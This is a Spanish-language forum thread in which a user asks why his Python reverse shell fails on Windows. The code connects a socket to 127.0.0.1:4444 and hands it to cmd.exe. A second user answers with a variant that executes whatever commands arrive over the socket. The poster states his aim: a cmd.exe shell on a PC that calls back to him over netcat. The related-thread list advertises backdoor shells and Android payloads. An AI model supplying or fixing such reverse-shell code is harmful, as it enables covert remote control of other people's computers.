Autor
|
Tema: [PYTHON] Crear reverse shell con socket + netcat (Leído 4,784 veces)
|
Sentex
Desconectado
Mensajes: 87
Programador
|
Hola buenas he buscado por google pero no he encontrado nada se que funciona en linux pero en windows me da error. #!/usr/bin/python import socket import subprocess import os host = "127.0.0.1" port = 4444 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p = subprocess.call(['cmd.exe'])
y me salta el error de Bad file descriptor y no se por que.
|
|
|
En línea
|
Preguntas o peticiones en twitter o discord:
Discord: MrSentex#1227 Twitter: @fbi_sentex
|
|
|
engel lex
|
creo que es por tratar de manejar un socket como un archivo en windows... para que usas el socket como archivo?
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
Sentex
Desconectado
Mensajes: 87
Programador
|
Y como la hago con socket
|
|
|
En línea
|
Preguntas o peticiones en twitter o discord:
Discord: MrSentex#1227 Twitter: @fbi_sentex
|
|
|
engel lex
|
lo que no entiendo es lo que quieres... no le veo sentido a crear un duplicado del file descriptor allí...
despues del conect solo tienes que enviar y recibir datos... ya se termina allí el problema
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
Sentex
Desconectado
Mensajes: 87
Programador
|
Como lo harías tu?
|
|
|
En línea
|
Preguntas o peticiones en twitter o discord:
Discord: MrSentex#1227 Twitter: @fbi_sentex
|
|
|
engel lex
|
#!/usr/bin/python import socket host = "127.0.0.1" port = 4444 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) while True: data = sock.recv(10240)#recibe hasta 10kb en una petición if data: print("se recibió:",data)
y listo... con la data haces lo que quieras... recv es bloqueante, así que es util muchas veces usar hilos
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
Sentex
Desconectado
Mensajes: 87
Programador
|
Pero lo que yo quiero hacer es crear una shell reversa de cmd con netcat de escucha por ahora con el codigo de arriba del todo funciona en linux pero en windows tengo que optar por descargar el archivo nc.exe.
|
|
|
En línea
|
Preguntas o peticiones en twitter o discord:
Discord: MrSentex#1227 Twitter: @fbi_sentex
|
|
|
engel lex
|
teoricamente es lo mismo solo tienes que cambiar linea 13 if data: print("se recibió:",data)
por if data: subprocess.call([data])
reviso en internet y sockets no parece producir ningún problema adicional al conectarse... tu servidor está bien configurado?, te da algún error alguna de las 2 partes, sé tan detallista como puedas, no tengo nada con que ayudarte
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
Sentex
Desconectado
Mensajes: 87
Programador
|
No haber yo quiero hacer una shell reversa (cmd.exe) en un pc y que se conecte a mi por netcat.
|
|
|
En línea
|
Preguntas o peticiones en twitter o discord:
Discord: MrSentex#1227 Twitter: @fbi_sentex
|
|
|
engel lex
|
eso es una shell reversa XD... es un programa #!/usr/bin/python
que abre una conexión desde ella hacia tu servidor host = "127.0.0.1" port = 4444 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port))
para ejecutar comandos que le envíes while True: data = sock.recv(10240)#recibe hasta 10kb en una petición if data: subprocess.call([data])
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Backdoor reverse shell con netcat
« 1 2 »
Hacking
|
skilled
|
14
|
13,769
|
15 Enero 2012, 19:20 pm
por aporeg
|
|
|
Bind and Reverse Backdoor Shell con Netcat
Redes
|
Socket_0x01
|
0
|
4,207
|
25 Febrero 2011, 05:07 am
por Socket_0x01
|
|
|
Usar subprocess a través de socket Python
Scripting
|
Sentex
|
0
|
1,655
|
8 Marzo 2018, 12:03 pm
por Sentex
|
|
|
Cómo crear un payload tcp reverse android
Hacking
|
FAV_1994
|
0
|
2,787
|
13 Mayo 2018, 00:39 am
por FAV_1994
|
|
|
Error en conexion de una shell reverse con netcat
Hacking
|
w4sp
|
2
|
3,786
|
26 Junio 2020, 09:48 am
por w4sp
|
|